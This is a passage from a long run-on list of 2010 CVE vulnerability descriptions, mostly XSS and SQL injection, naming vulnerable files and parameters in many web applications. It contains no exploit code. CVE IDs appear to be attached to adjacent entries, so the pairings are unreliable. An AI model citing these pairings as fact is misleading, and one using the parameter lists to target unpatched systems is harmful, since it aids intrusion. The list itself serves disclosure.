(XSS) vulnerability in Special:Login in JAMWiki before 0.8.4 allows remote attackers to inject arbitrary web script or HTML via the message parameter. [CVE-2010-5052] Cross-site scripting (XSS) vulnerability in admin/components.php in GetSimple CMS 2.01 allows remote attackers to inject arbitrary web script or HTML via the val[] parameter. [CVE-2010-5051] Cross-site scripting (XSS) vulnerability in admin/core/admin_func.php in razorCMS 1.0 stable allows remote attackers to inject arbitrary web script or HTML via the content parameter in an edit action to admin/index.php. [CVE-2010-5050] Cross-site scripting (XSS) vulnerability in jsp/admin/tools/remote_share.jsp in ManageEngine ADManager Plus 4.4.0 allows remote attackers to inject arbitrary web script or HTML via the computerName parameter. NOTE: the provenance of this information is unknown [CVE-2010-5048] Cross-site scripting (XSS) vulnerability in admin.jcomments.php in the JoomlaTune JComments (com_jcomments) component 2.1.0.0 for Joomla! allows remote authenticated users to inject arbitrary web script or HTML via the name parameter to index.php. [CVE-2010-5046] Cross-site scripting (XSS) vulnerability in admin.php in ecoCMS allows remote attackers to inject arbitrary web script or HTML via the p parameter. [CVE-2010-5045] Cross-site scripting (XSS) vulnerability in poll/default.asp in Smart ASP Survey allows remote attackers to inject arbitrary web script or HTML via the catid parameter. [CVE-2010-5042] Cross-site scripting (XSS) vulnerability in the DJ-ArtGallery (com_djartgallery) component 0.9.1 for Joomla! allows remote attackers to inject arbitrary web script or HTML via the cid[] parameter in an editItem action to administrator/index.php. NOTE: some of these details are obtained from third party information. [CVE-2010-5035] Cross-site scripting (XSS) vulnerability in search.php in iScripts eSwap 2.0 allows remote attackers to inject arbitrary web script or HTML via the txtHomeSearch parameter (aka the search field). NOTE: some of these details are obtained from third party information. [CVE-2010-5031] Cross-site scripting (XSS) vulnerability in index.php in fileNice 1.1 allows remote attackers to inject arbitrary web script or HTML via the sstring parameter (aka the Search Box). NOTE: some of these details are obtained from third party information. [CVE-2010-5030] Cross-site scripting (XSS) vulnerability in index.php in Ecomat CMS 5.0 allows remote attackers to inject arbitrary web script or HTML via the lang parameter in a web action. [CVE-2010-5029] SQL injection vulnerability in index.php in Ecomat CMS 5.0 allows remote attackers to execute arbitrary SQL commands via the show parameter in a web action. [CVE-2010-5027] Cross-site scripting (XSS) vulnerability in winners.php in Science Fair In A Box (SFIAB) 2.0.6 and 2.2.0 allows remote attackers to inject arbitrary web script or HTML via the type parameter. NOTE: some of these details are obtained from third party information. [CVE-2010-5025] Cross-site scripting (XSS) vulnerability in manage/main.php in CuteSITE CMS 1.2.3 and 1.5.0 allows remote attackers to inject arbitrary web script or HTML via the fld_path parameter. NOTE: some of these details are obtained from third party information. [CVE-2010-5018] Cross-site scripting (XSS) vulnerability in products/classified/headersearch.php in 2daybiz Online Classified Script allows remote attackers to inject arbitrary web script or HTML via the sid parameter. [CVE-2010-5010] Cross-site scripting (XSS) vulnerability in schoolmv2/html/studentmain.php in SchoolMation 2.3 allows remote attackers to inject arbitrary web script or HTML via the session parameter. [CVE-2010-5007] Cross-site scripting (XSS) vulnerability in pages/match_report.php in UTStats Beta 4 and earlier allows remote attackers to inject arbitrary web script or HTML via the mid parameter. [CVE-2010-5005] Cross-site scripting (XSS) vulnerability in members/profileCommentsResponse.php in Rayzz Photoz allows remote attackers to inject arbitrary web script or HTML via the profileCommentTextArea parameter. NOTE: the provenance of this information is unknown [CVE-2010-5002] Cross-site scripting (XSS) vulnerability in modules/slideshowmodule/slideshow.js.php in Exponent CMS 0.97.0 allows remote attackers to inject arbitrary web script or HTML via the u parameter. [CVE-2010-4985] Cross-site scripting (XSS) vulnerability in notes.php in My Kazaam Notes Management System allows remote attackers to inject arbitrary web script or HTML via vectors involving the "Enter Reference Number Below" text box. [CVE-2010-4978] Cross-site scripting (XSS) vulnerability in image/view.php in CANDID allows remote attackers to inject arbitrary web script or HTML via the image_id parameter. [CVE-2010-4976] Cross-site scripting (XSS) vulnerability in search/search.php in MetInfo 3.0 allows remote attackers to inject arbitrary web script or HTML via the searchword parameter (aka Search Box field). NOTE: some of these details are obtained from third party information. [CVE-2010-4973] Cross-site scripting (XSS) vulnerability in the search feature in Campsite 3.4.0 allows remote attackers to inject arbitrary web script or HTML via the f_search_keywords parameter. NOTE: the provenance of this information is unknown [CVE-2010-4971] Cross-site scripting (XSS) vulnerability in VideoWhisper PHP 2 Way Video Chat component for Joomla! allows remote attackers to inject arbitrary web script or HTML via the r parameter to index.php. [CVE-2010-4970] SQL injection vulnerability in handlers/getpage.php in Wiki Web Help 0.28 allows remote attackers to execute arbitrary SQL commands via the id parameter. [CVE-2010-4968] SQL injection vulnerability in the webmaster-tips.net Flash Gallery (com_wmtpic) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the Itemid parameter to index.php. [CVE-2010-4966] Cross-site scripting (XSS) vulnerability in default.asp in ATCOM Netvolution allows remote attackers to inject arbitrary web script or HTML via the query parameter in a Search action. [CVE-2010-4962] Unspecified vulnerability in the Webkit PDFs (webkitpdf) extension before 1.1.4 for TYPO3 allows remote attackers to execute arbitrary commands via unknown vectors. [CVE-2010-4961] SQL injection vulnerability in the Webkit PDFs (webkitpdf) extension before 1.1.4 for TYPO3 allows remote attackers to execute arbitrary SQL commands via unspecified vectors. [CVE-2010-4960] Cross-site scripting (XSS) vulnerability in the Branchenbuch (aka Yellow Pages or mh_branchenbuch) extension before 0.9.1 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-4956] Cross-site scripting (XSS) vulnerability in the Questionnaire (ke_questionnaire) extension before 2.2.3 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-4951] Cross-site scripting (XSS) vulnerability in the xaJax Shoutbox (vx_xajax_shoutbox) extension before 1.0.1 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-4949] Cross-site scripting (XSS) vulnerability in the (1) FreiChat component before 2.1.2 for Joomla! and the (2) FreiChatPure component before 1.2.2 for Joomla! allows remote attackers to inject arbitrary web script or HTML by entering it in an unspecified window. [CVE-2010-4947] Cross-site scripting (XSS) vulnerability in advanced_search_result.php in ALLPC 2.5 allows remote attackers to inject arbitrary web script or HTML via the keywords parameter. [CVE-2010-4938] SQL injection vulnerability in the Weblinks (com_weblinks) component in Joomla! allows remote attackers to execute arbitrary SQL commands via the Itemid parameter in a categories action to index.php. NOTE: the provenance of this information is unknown [CVE-2010-4932] Cross-site scripting (XSS) vulnerability in search.php in Entrans before 0.3.3 allows remote attackers to inject arbitrary web script or HTML via the query parameter. [CVE-2010-4930] Cross-site scripting (XSS) vulnerability in index.php in @mail Webmail before 6.2.0 allows remote attackers to inject arbitrary web script or HTML via the MailType parameter in a mail/auth/processlogin action. [CVE-2010-4928] Cross-site scripting (XSS) vulnerability in the Restaurant Guide (com_restaurantguide) component 1.0.0 for Joomla! allows remote attackers to inject arbitrary web script or HTML by placing it after a > (greater than) character. [CVE-2010-4920] SQL injection vulnerability in detail.asp in Micronetsoft Rental Property Management Website 1.0 allows remote attackers to execute arbitrary SQL commands via the ad_ID parameter. [CVE-2010-4919] SQL injection vulnerability in detail.asp in Micronetsoft RV Dealer Website 1.0 allows remote attackers to execute arbitrary SQL commands via the vehicletypeID parameter. [CVE-2010-4913] Cross-site scripting (XSS) vulnerability in the search feature in ColdGen ColdUserGroup 1.06 allows remote attackers to inject arbitrary web script or HTML via the Keywords parameter. NOTE: some of these details are obtained from third party information. [CVE-2010-4909] Multiple cross-site scripting (XSS) vulnerabilities in PaysiteReviewCMS 1.1 allow remote attackers to inject arbitrary web script or HTML via the (1) q parameter to search.php or the (2) image parameter to image.php. [CVE-2010-4907] Cross-site scripting (XSS) vulnerability in zp-core/admin.php in Zenphoto 1.3 allows remote attackers to inject arbitrary web script or HTML via the user parameter. NOTE: the from parameter is already covered by CVE-2009-4562. [CVE-2010-4901] Multiple cross-site scripting (XSS) vulnerabilities in char_map.php in MySource Matrix 3.28.3 allow remote attackers to inject arbitrary web script or HTML via the (1) height or (2) width parameter. [CVE-2010-4900] Open redirect vulnerability in c.php in CMS WebManager-Pro 8.1 and earlier allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the url parameter. [CVE-2010-4899] SQL injection vulnerability in c.php in CMS WebManager-Pro before 8.1 allows remote attackers to execute arbitrary SQL commands via the id parameter. [CVE-2010-4896] Cross-site scripting (XSS) vulnerability in admin/index.asp in Member Management System 4.0 allows remote attackers to inject arbitrary web script or HTML via the REF_URL parameter. [CVE-2010-4895] Cross-site scripting (XSS) vulnerability in core/showsite.php in chillyCMS 1.1.3 allows remote attackers to inject arbitrary web script or HTML via the name parameter (aka the username field). NOTE: some of these details are obtained from third party information. [CVE-2010-4893] Cross-site scripting (XSS) vulnerability in foodvendors.php in FestOS 2.3b allows remote attackers to inject arbitrary web script or HTML via the category parameter in a details action. [CVE-2010-4892] Cross-site scripting (XSS) vulnerability in the powermail extension before 1.5.5 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-4890] Cross-site scripting (XSS) vulnerability in the Yet Another Calendar (ke_yac) extension before 1.1.2 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-4886] Cross-site scripting (XSS) vulnerability in the "official twitter tweet button for your page" (tweetbutton) extension before 1.0.5 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-4885] Cross-site scripting (XSS) vulnerability in the XING Button (xing) extension before 1.0.2 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-4883] Cross-site scripting (XSS) vulnerability in manager/index.php in MODx Revolution 2.0.2-pl allows remote attackers to inject arbitrary web script or HTML via the modhash parameter. [CVE-2010-4882] Cross-site scripting (XSS) vulnerability in autocms.php in Auto CMS 1.6 allows remote attackers to inject arbitrary web script or HTML via the sitetitle parameter. [CVE-2010-4880] Multiple cross-site scripting (XSS) vulnerabilities in calendar.class.php in ApPHP Calendar (ApPHP CAL) allow remote attackers to inject arbitrary web script or HTML via the (1) category_name, (2) category_description, (3) event_name, or (4) event_description parameter. [CVE-2010-4877] Cross-site scripting (XSS) vulnerability in index.php in OneCMS 2.6.1 allows remote attackers to inject arbitrary web script or HTML via the view parameter. [CVE-2010-4875] Cross-site scripting (XSS) vulnerability in vodpod-video-gallery/vodpod_gallery_thumbs.php in the Vodpod Video Gallery Plugin 3.1.5 for WordPress allows remote attackers to inject arbitrary web script or HTML via the gid parameter. [CVE-2010-4874] Multiple cross-site scripting (XSS) vulnerabilities in users.php in NinkoBB 1.3 RC5 allow remote attackers to inject arbitrary web script or HTML via the (1) first_name, (2) last_name, (3) msn, or (4) aim parameter. [CVE-2010-4873] Cross-site scripting (XSS) vulnerability in confirm.php in WeBid 0.8.5 P1 allows remote attackers to inject arbitrary web script or HTML via the id parameter. [CVE-2010-4868] Cross-site scripting (XSS) vulnerability in search.php3 (aka search.php) in W-Agora 4.2.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the bn parameter. [CVE-2010-4863] Cross-site scripting (XSS) vulnerability in admin/changedata.php in GetSimple CMS 2.01 allows remote attackers to inject arbitrary web script or HTML via the post-title parameter. [CVE-2010-4861] SQL injection vulnerability in asearch.php in webSPELL 4.2.1 allows remote attackers to execute arbitrary SQL commands via the search parameter. [CVE-2010-4859] SQL injection vulnerability in index.php in WebAsyst Shop-Script allows remote attackers to execute arbitrary SQL commands via the blog_id parameter in a news action. [CVE-2010-4856] SQL injection vulnerability in arsiv.asp in xWeblog 2.2 allows remote attackers to execute arbitrary SQL commands via the tarih parameter. [CVE-2010-4855] SQL injection vulnerability in oku.asp in xWeblog 2.2 allows remote attackers to execute arbitrary SQL commands via the makale_id parameter. [CVE-2010-4852] Cross-site scripting (XSS) vulnerability in login.php in Eclime 1.1.2b allows remote attackers to inject arbitrary web script or HTML via the reason parameter in a fail action. [CVE-2010-4850] Multiple cross-site scripting (XSS) vulnerabilities in Diferior 8.03 allow remote attackers to inject arbitrary web script or HTML via the (1) post_content parameter to post/edit/2/p1.html, related to views/post.php [CVE-2010-4848] Multiple cross-site scripting (XSS) vulnerabilities in addlink.php in AXScripts AxsLinks 0.3 allow remote attackers to inject arbitrary web script or HTML via the (1) url or (2) title parameter. [CVE-2010-4843] SQL injection vulnerability in website-page.php in PHP Web Scripts Ad Manager Pro 3.0 allows remote attackers to execute arbitrary SQL commands via the pageId parameter. [CVE-2010-4841] Multiple cross-site scripting (XSS) vulnerabilities in ManageEngine EventLog Analyzer 6.1 allow remote attackers to inject arbitrary web script or HTML via the (1) HOST_ID, (2) OS, (3) GROUP, (4) exportFile, (5) load, (6) type, or (7) tab parameter to INDEX.do, the (8) reported parameter to INDEX2.do, the (9) gId parameter to hostlist.do, the (10) newWindow parameter to globalSettings.do, or the (11) STATUS parameter to enableHost.do. [CVE-2010-4837] Cross-site scripting (XSS) vulnerability in the JSupport (com_jsupport) component 1.5.6 for Joomla! allows remote attackers to inject arbitrary web script or HTML via the subject parameter (title field) in a saveTicket action to index2.php. NOTE: some of these details are obtained from third party information. [CVE-2010-4836] Cross-site scripting (XSS) vulnerability in register.html in PHPShop 2.1 EE and earlier allows remote attackers to inject arbitrary web script or HTML via the name_new parameter. [CVE-2010-4828] Multiple cross-site scripting (XSS) vulnerabilities in SolarWinds Orion Network Performance Monitor (NPM) 10.1 allow remote attackers to inject arbitrary web script or HTML via the (1) Title parameter to MapView.aspx [CVE-2010-4827] Cross-site scripting (XSS) vulnerability in members.asp in Snitz Forums 2000 3.4.07 allows remote attackers to inject arbitrary web script or HTML via the M_NAME parameter. NOTE: some of these details are obtained from third party information. [CVE-2010-4825] Cross-site scripting (XSS) vulnerability in magpie_debug.php in the Twitter Feed plugin (wp-twitter-feed) 0.3.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the url parameter. [CVE-2010-4823] Cross-site scripting (XSS) vulnerability in the httpError method in sapphire/core/control/RequestHandler.php in SilverStripe 2.3.x before 2.3.10 and 2.4.x before 2.4.4, when custom error handling is not used, allows remote attackers to inject arbitrary web script or HTML via "missing URL actions." [CVE-2010-4821] Cross-site scripting (XSS) vulnerability in phpMyFAQ before 2.6.9 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to index.php. [CVE-2010-4813] Cross-site scripting (XSS) vulnerability in the Category Tokens module 6.x before 6.x-1.1 for Drupal allows remote authenticated users with administer taxonomy permissions to inject arbitrary web script or HTML by editing or creating vocabulary names, which are not properly handled in token help. [CVE-2010-4811] Multiple cross-site scripting (XSS) vulnerabilities in ajaxmember.php in 6kbbs 8.0 build 20100901 allow remote attackers to inject arbitrary web script or HTML via the (1) user[msn], (2) user[email], and (3) user[phone] parameters in a modifyDetails action. [CVE-2010-4810] Multiple PHP remote file inclusion vulnerabilities in AR Web Content Manager (AWCM) 2.1 final allow remote attackers to execute arbitrary PHP code via a URL in the theme_file parameter to (1) includes/window_top.php and (2) header.php, and the (3) lang_file parameter to control/common.php. [CVE-2010-4808] SQL injection vulnerability in index.php in Webmatic allows remote attackers to execute arbitrary SQL commands via the p parameter. [CVE-2010-4807] Race condition in IBM Web Content Manager (WCM) 7.0.0.1 before CF003 allows remote authenticated users to cause a denial of service (infinite recursive query) via unspecified vectors, related to a StackOverflowError exception. [CVE-2010-4806] The authoring tool in IBM Web Content Manager (WCM) 6.1.5, and 7.0.0.1 before CF003, allows remote authenticated users to bypass intended access restrictions on draft creation by leveraging certain resource editor privileges. [CVE-2010-4794] Multiple cross-site scripting (XSS) vulnerabilities in the JoomlaSeller JS Calendar (com_jscalendar) component 1.5.1 and 1.5.4 for Joomla! allow remote attackers to inject arbitrary web script or HTML via the (1) month and (2) year parameters in a jscalendar action to index.php. NOTE: some of these details are obtained from third party information. [CVE-2010-4792] Cross-site scripting (XSS) vulnerability in title.php in OPEN IT OverLook 5.0 allows remote attackers to inject arbitrary web script or HTML via the frame parameter. [CVE-2010-4784] Multiple SQL injection vulnerabilities in member.php in PHP Web Scripts Easy Banner Free 2009.05.18, when magic_quotes_gpc is disabled, allow remote attackers to execute arbitrary SQL commands via the (1) username and (2) password parameters. [CVE-2010-4783] Multiple cross-site scripting (XSS) vulnerabilities in index.php in PHP Web Scripts Easy Banner Free 2009.05.18, when magic_quotes_gpc is disabled, allow remote attackers to inject arbitrary web script or HTML via the (1) siteurl and (2) urlbanner parameters. [CVE-2010-4782] Multiple SQL injection vulnerabilities in list.asp in Softwebs Nepal (aka Ananda Raj Pandey) Ananda Real Estate 3.4 allow remote attackers to execute arbitrary SQL commands via the (1) city, (2) state, (3) country, (4) minprice, (5) maxprice, (6) bed, and (7) bath parameters, different vectors than CVE-2006-6807. [CVE-2010-4779] Cross-site scripting (XSS) vulnerability in lib/includes/auth.inc.php in the WPtouch plugin 1.9.19.4 and 1.9.20 for WordPress allows remote attackers to inject arbitrary web script or HTML via the wptouch_settings parameter to include/adsense-new.php. NOTE: some of these details are obtained from third party information. [CVE-2010-4778] Multiple cross-site scripting (XSS) vulnerabilities in fetchmailprefs.php in Horde IMP before 4.3.8, and Horde Groupware Webmail Edition before 1.2.7, allow remote attackers to inject arbitrary web script or HTML via the (1) username (aka fmusername), (2) password (aka fmpassword), or (3) server (aka fmserver) field in a fetchmail_prefs_save action, related to the Fetchmail configuration, a different issue than CVE-2010-3695. NOTE: some of these details are obtained from third party information. [CVE-2010-4772] Cross-site scripting (XSS) vulnerability in blocks/lang.php in S-CMS 2.5 allows remote attackers to inject arbitrary web script or HTML via the id parameter to viewforum.php. [CVE-2010-4761] The customer-interface ticket-print dialog in Open Ticket Request System (OTRS) before 3.0.0-beta3 does not properly restrict customer-visible data, which allows remote authenticated users to obtain potentially sensitive information from the (1) responsible, (2) owner, (3) accounted time, (4) pending until, and (5) lock fields by reading this dialog. [CVE-2010-4757] Cross-site scripting (XSS) vulnerability in submitnews.php in e107 before 0.7.23 allows remote attackers to inject arbitrary web script or HTML via the submitnews_title parameter, a different vector than CVE-2008-6208. NOTE: some of these details are obtained from third party information. NOTE: this might be the same as CVE-2009-4083.1 or CVE-2011-0457. [CVE-2010-4753] Cross-site scripting (XSS) vulnerability in LightNEasy.php in LightNEasy 3.2.1 allows remote attackers to inject arbitrary web script or HTML via the id parameter, which is not properly handled in a forced SQL error message. [CVE-2010-4749] Multiple cross-site scripting (XSS) vulnerabilities in BLOG:CMS 4.2.1.e, and possibly earlier, allow remote attackers to inject arbitrary web script or HTML via the (1) body parameter to action.php and the (2) amount and (3) action parameters to admin/index.php. [CVE-2010-4748] Cross-site scripting (XSS) vulnerability in pmwiki.php in PmWiki 2.2.20 allows remote attackers to inject arbitrary web script or HTML via the from parameter to Main/WikiSandbox. NOTE: some of these details are obtained from third party information. [CVE-2010-4747] Cross-site scripting (XSS) vulnerability in wordpress-processing-embed/data/popup.php in the Processing Embed plugin 0.5 for WordPress allows remote attackers to inject arbitrary web script or HTML via the pluginurl parameter. [CVE-2010-4745] Cross-site scripting (XSS) vulnerability in nav.html in PHPXref before 0.7.1 allows remote attackers to inject arbitrary web script or HTML via the query string. [CVE-2010-4737] SQL injection vulnerability in resorts.asp in HotWebScripts HotWeb Rentals allows remote attackers to execute arbitrary SQL commands via the PropResort parameter. [CVE-2010-4734] Multiple cross-site scripting (XSS) vulnerabilities in the comment feature in Skeletonz CMS 1.0, when the Blog plugin is enabled, allow remote attackers to inject arbitrary web script or HTML via the (1) Name, (2) Website, and (3) Email parameters. NOTE: some of these details are obtained from third party information. [CVE-2010-4732] cgi-bin/read.cgi in WebSCADA WS100 and WS200, Easy Connect EC150, Modbus RTU - TCP Gateway MB100, and Serial Ethernet Server SS100 on the IntelliCom NetBiter NB100 and NB200 platforms allows remote authenticated administrators to execute arbitrary code by using a config.html 2.conf action to replace the logo page's GIF image file with a file containing this code, a different vulnerability than CVE-2009-4463. [CVE-2010-4731] Absolute path traversal vulnerability in cgi-bin/read.cgi in WebSCADA WS100 and WS200, Easy Connect EC150, Modbus RTU - TCP Gateway MB100, and Serial Ethernet Server SS100 on the IntelliCom NetBiter NB100 and NB200 platforms allows remote authenticated administrators to read arbitrary files via a full pathname in the file parameter, a different vulnerability than CVE-2009-4463. [CVE-2010-4730] Directory traversal vulnerability in cgi-bin/read.cgi in WebSCADA WS100 and WS200, Easy Connect EC150, Modbus RTU - TCP Gateway MB100, and Serial Ethernet Server SS100 on the IntelliCom NetBiter NB100 and NB200 platforms allows remote authenticated administrators to read arbitrary files via a .. (dot dot) in the page parameter, a different vulnerability than CVE-2009-4463. [CVE-2010-4718] Multiple cross-site scripting (XSS) vulnerabilities in the Lyftenbloggie (com_lyftenbloggie) component 1.1.0 for Joomla! allow remote attackers to inject arbitrary web script or HTML via the (1) tag and (2) category parameters to index.php. [CVE-2010-4716] Cross-site scripting (XSS) vulnerability in the WebPublisher component in Novell GroupWise before 8.02HP allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-4715] Multiple directory traversal vulnerabilities in the (1) WebAccess Agent and (2) Document Viewer Agent components in Novell GroupWise before 8.02HP allow remote attackers to read arbitrary files via unspecified vectors. NOTE: some of these details are obtained from third party information. [CVE-2010-4714] Multiple stack-based buffer overflows in Novell GroupWise before 8.02HP allow remote attackers to execute arbitrary code via a long HTTP Host header to (1) gwpoa.exe in the Post Office Agent, (2) gwmta.exe in the Message Transfer Agent, (3) gwia.exe in the Internet Agent, (4) the WebAccess Agent, or (5) the Monitor Agent. [CVE-2010-4710] Cross-site scripting (XSS) vulnerability in the addItem method in the Menu widget in YUI before 2.9.0 allows remote attackers to inject arbitrary web script or HTML via a field that is added to a menu, related to documentation that specifies this field as a text field rather than an HTML field, a similar issue to CVE-2010-4569 and CVE-2010-4570. [CVE-2010-4703] SQL injection vulnerability in default.asp in HotWebScripts HotWeb Rentals allows remote attackers to execute arbitrary SQL commands via the PageId parameter. NOTE: the provenance of this information is unknown [CVE-2010-4693] Multiple cross-site scripting (XSS) vulnerabilities in Coppermine Photo Gallery 1.5.10 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) h and (2) t parameters to help.php, or (3) picfile_XXX parameter to searchnew.php. [CVE-2010-4690] The Mobile User Security (MUS) service on Cisco Adaptive Security Appliances (ASA) 5500 series devices with software before 8.3(2) does not properly authenticate HTTP requests from a Web Security appliance (WSA), which might allow remote attackers to obtain sensitive information via a HEAD request, aka Bug ID CSCte53635. [CVE-2010-4680] The WebVPN implementation on Cisco Adaptive Security Appliances (ASA) 5500 series devices with software before 8.2(3) permits the viewing of CIFS shares even when CIFS file browsing has been disabled, which allows remote authenticated users to bypass intended access restrictions via CIFS requests, aka Bug ID CSCsz80777. [CVE-2010-4677] emWEB on Cisco Adaptive Security Appliances (ASA) 5500 series devices with software before 8.2(3) allows remote attackers to cause a denial of service (daemon crash) via a request for a document whose name contains space characters, aka Bug ID CSCsy08416. [CVE-2010-4675] Cisco Adaptive Security Appliances (ASA) 5500 series devices with software before 8.2(3) do not properly determine the interfaces for which TELNET connections should be permitted, which allows remote authenticated users to bypass intended access restrictions via vectors involving the "lowest security level interface," aka Bug ID CSCsv40504. [CVE-2010-4667] Cross-site scripting (XSS) vulnerability in Coppermine Photo Gallery (CPG) before 1.4.27 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-4647] Multiple cross-site scripting (XSS) vulnerabilities in the Help Contents web application (aka the Help Server) in Eclipse IDE before 3.6.2 allow remote attackers to inject arbitrary web script or HTML via the query string to (1) help/index.jsp or (2) help/advanced/content.jsp. [CVE-2010-4646] Cross-site scripting (XSS) vulnerability in Hastymail2 before 1.01 allows remote attackers to inject arbitrary web script or HTML via a crafted background attribute within a cell in a TABLE element, related to improper use of the htmLawed filter. [CVE-2010-4642] Cross-site scripting (XSS) vulnerability in XWiki Enterprise before 2.5 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-4640] Multiple cross-site scripting (XSS) vulnerabilities in XWiki Watch 1.0 allow remote attackers to inject arbitrary web script or HTML via the rev parameter to (1) bin/viewrev/Main/WebHome and (2) bin/view/Blog, and the (3) register_first_name and (4) register_last_name parameters to bin/register/XWiki/Register. NOTE: the provenance of this information is unknown [CVE-2010-4637] Cross-site scripting (XSS) vulnerability in feedlist/handler_image.php in the FeedList plugin 2.61.01 for WordPress allows remote attackers to inject arbitrary web script or HTML via the i parameter. [CVE-2010-4631] Multiple cross-site scripting (XSS) vulnerabilities in ASPilot Pilot Cart 7.3 allow remote attackers to inject arbitrary web script or HTML via the (1) countrycode parameter to contact.asp, USERNAME parameter to (2) gateway.asp and (3) cart.asp, and the specific parameter to (4) quote.asp and (5) buyitnow. [CVE-2010-4630] Cross-site scripting (XSS) vulnerability in pages/admin/surveys/create.php in the WP Survey And Quiz Tool plugin 1.2.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the action parameter. [CVE-2010-4623] WebSEAL in IBM Tivoli Access Manager for e-business 6.1.1 before 6.1.1-TIV-AWS-FP0001 allows remote authenticated users to cause a denial of service (worker thread consumption) via shift-reload actions. [CVE-2010-4622] Directory traversal vulnerability in WebSEAL in IBM Tivoli Access Manager for e-business 6.1.1 before 6.1.1-TIV-AWS-FP0001 on AIX allows remote attackers to read arbitrary files via a %uff0e%uff0e (encoded dot dot) in a URI. [CVE-2010-4618] Cross-site scripting (XSS) vulnerability in the Algis Info aiContactSafe component before 2.0.14 for Joomla! allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-4616] Cross-site scripting (XSS) vulnerability in modules/content/admin/content.php in ImpressCMS 1.2.3 Final, and possibly other versions before 1.2.4, allows remote attackers to inject arbitrary web script or HTML via the quicksearch_ContentContent parameter. [CVE-2010-4610] Cross-site scripting (XSS) vulnerability in index.php in Html-edit CMS 3.1.8 allows remote attackers to inject arbitrary web script or HTML via the error parameter. [CVE-2010-4607] Multiple cross-site scripting (XSS) vulnerabilities in Habari 0.6.5, when register_globals is enabled, allow remote attackers to inject arbitrary web script or HTML via the (1) additem_form parameter to system/admin/dash_additem.php and the (2) status_data[] parameter to system/admin/dash_status.php. NOTE: some of these details are obtained from third party information. [CVE-2010-4602] The Web client in IBM Rational ClearQuest 7.1.1.x before 7.1.1.4 and 7.1.2.x before 7.1.2.1 allows remote authenticated users to bypass "restricted user" limitations, and read arbitrary records, via a modified record number in the URL for a RECORD action, as demonstrated by a modified bookmark. [CVE-2010-4600] Dojo Toolkit, as used in the Web client in IBM Rational ClearQuest 7.1.1.x before 7.1.1.4 and 7.1.2.x before 7.1.2.1, allows remote attackers to read cookies by navigating to a Dojo file, related to an "open direct" issue. [CVE-2010-4597] Stack-based buffer overflow in the save method in the IntegraXor.Project ActiveX control in igcomm.dll in Ecava IntegraXor Human-Machine Interface (HMI) before 3.5.3900.10 allows remote attackers to execute arbitrary code via a long string in the second argument. [CVE-2010-4590] Cross-site scripting (XSS) vulnerability in HTTP Access Services (HTTP-AS) in the Connection Manager in IBM Lotus Mobile Connect (LMC) before 6.1.4 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-4589] Cross-site scripting (XSS) vulnerability in IBM ENOVIA 6 allows remote attackers to inject arbitrary web script or HTML via vectors related to the emxFramework.FilterParameterPattern property. [CVE-2010-4586] The default configuration of Opera before 11.00 enables WebSockets functionality, which has unspecified impact and remote attack vectors, possibly a related issue to CVE-2010-4508. [CVE-2010-4584] Opera before 11.00, when Opera Turbo is used, does not properly present information about problematic X.509 certificates on https web sites, which might make it easier for remote attackers to spoof trusted content via a crafted web site. [CVE-2010-4583] Opera before 11.00, when Opera Turbo is enabled, does not display a page's security indication, which makes it easier for remote attackers to spoof trusted content via a crafted web site. [CVE-2010-4580] Opera before 11.00 does not clear WAP WML form fields after manual navigation to a new web site, which allows remote attackers to obtain sensitive information via an input field that has the same name as an input field on a previously visited web site. [CVE-2010-4579] Opera before 11.00 does not properly constrain dialogs to appear on top of rendered documents, which makes it easier for remote attackers to trick users into interacting with a crafted web site that spoofs the (1) security information dialog or (2) download dialog. [CVE-2010-4577] The CSSParser::parseFontFaceSrc function in WebCore/css/CSSParser.cpp in WebKit, as used in Google Chrome before 8.0.552.224, Chrome OS before 8.0.552.343, webkitgtk before 1.2.6, and other products does not properly parse Cascading Style Sheets (CSS) token sequences, which allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted local font, related to "Type Confusion." [CVE-2010-4576] browser/worker_host/message_port_dispatcher.cc in Google Chrome before 8.0.552.224 and Chrome OS before 8.0.552.343 does not properly handle certain postMessage calls, which allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via crafted JavaScript code that creates a web worker. [CVE-2010-4570] Cross-site scripting (XSS) vulnerability in the duplicate-detection functionality in Bugzilla 3.7.1, 3.7.2, 3.7.3, and 4.0rc1 allows remote attackers to inject arbitrary web script or HTML via the summary field, related to the DataTable widget in YUI. [CVE-2010-4569] Cross-site scripting (XSS) vulnerability in Bugzilla 3.7.1, 3.7.2, 3.7.3, and 4.0rc1 allows remote attackers to inject arbitrary web script or HTML via the real name field of a user account, related to the AutoComplete widget in YUI. [CVE-2010-4566] The web authentication form in the NT4 authentication component in Citrix Access Gateway Enterprise Edition 9.2-49.8 and earlier, and the NTLM authentication component in Access Gateway Standard and Advanced Editions before Access Gateway 5.0, allows attackers to execute arbitrary commands via shell metacharacters in the password field. [CVE-2010-4555] Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.21 and earlier allow remote attackers to inject arbitrary web script or HTML via vectors involving (1) drop-down selection lists, (2) the > (greater than) character in the SquirrelSpell spellchecking plugin, and (3) errors associated with the Index Order (aka options_order) page. [CVE-2010-4554] functions/page_header.php in SquirrelMail 1.4.21 and earlier does not prevent page rendering inside a frame in a third-party HTML document, which makes it easier for remote attackers to conduct clickjacking 